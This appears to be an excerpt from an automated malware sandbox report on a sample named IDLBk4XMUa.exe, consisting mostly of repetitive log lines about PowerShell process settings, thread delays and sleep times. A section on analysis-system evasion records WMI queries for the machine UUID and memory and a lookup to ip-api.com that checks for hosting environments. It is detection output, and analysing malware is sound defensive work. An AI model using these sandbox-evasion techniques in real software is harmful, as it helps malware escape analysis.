                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exe; Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Memory allocated: 200963D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Memory allocated: 200AFF70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 597422
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 597286
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 597171
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 597062
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596948
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596841
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596706
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596567
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596453
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596343
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596234
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596124
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 596015
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595906
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595792
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595687
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595578
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595468
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595359
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595250
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595140
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 595031
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594921
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594812
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594703
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594593
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594482
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594375
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594265
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594156
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 594046
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 593932
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 593828
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 593718
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe; Thread delayed: delay time: 593605
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593491Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593390Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593281Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593171Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593062Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592953Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592843Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592734Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592624Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592515Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592406Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592296Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Window / User API: threadDelayed 5820
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Window / User API: threadDelayed 4034
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5693
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4114
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1978
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 363
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -597422s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -597286s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596948s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596841s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596706s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596567s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596124s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595792s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594482s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594375s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594265s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594156s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -594046s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593932s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593828s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593718s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593605s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593491s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593390s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593281s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593171s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -593062s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592953s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592843s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592734s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592624s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592515s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592406s >= -30000s
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028 | Thread sleep time: -592296s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 | Thread sleep count: 5693 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 | Thread sleep count: 4114 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep count: 2259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep count: 994 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep count: 3882 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 | Thread sleep count: 1978 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 | Thread sleep count: 4458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124 | Thread sleep count: 1928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 | Thread sleep count: 3365 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 | Thread sleep count: 363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 597422
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 597286
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 597171
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 597062
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596948
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596841
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596706
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596567
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596343
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596234
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596124
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595792
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595468
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594921
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594703
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594593
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594482
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594375
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594265
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594156
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 594046
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593932
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593828
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593718
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593605
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593491
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593390
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593281
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593171
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 593062
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592953
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592843
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592734
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592624
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592515
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592406
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Thread delayed: delay time: 592296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
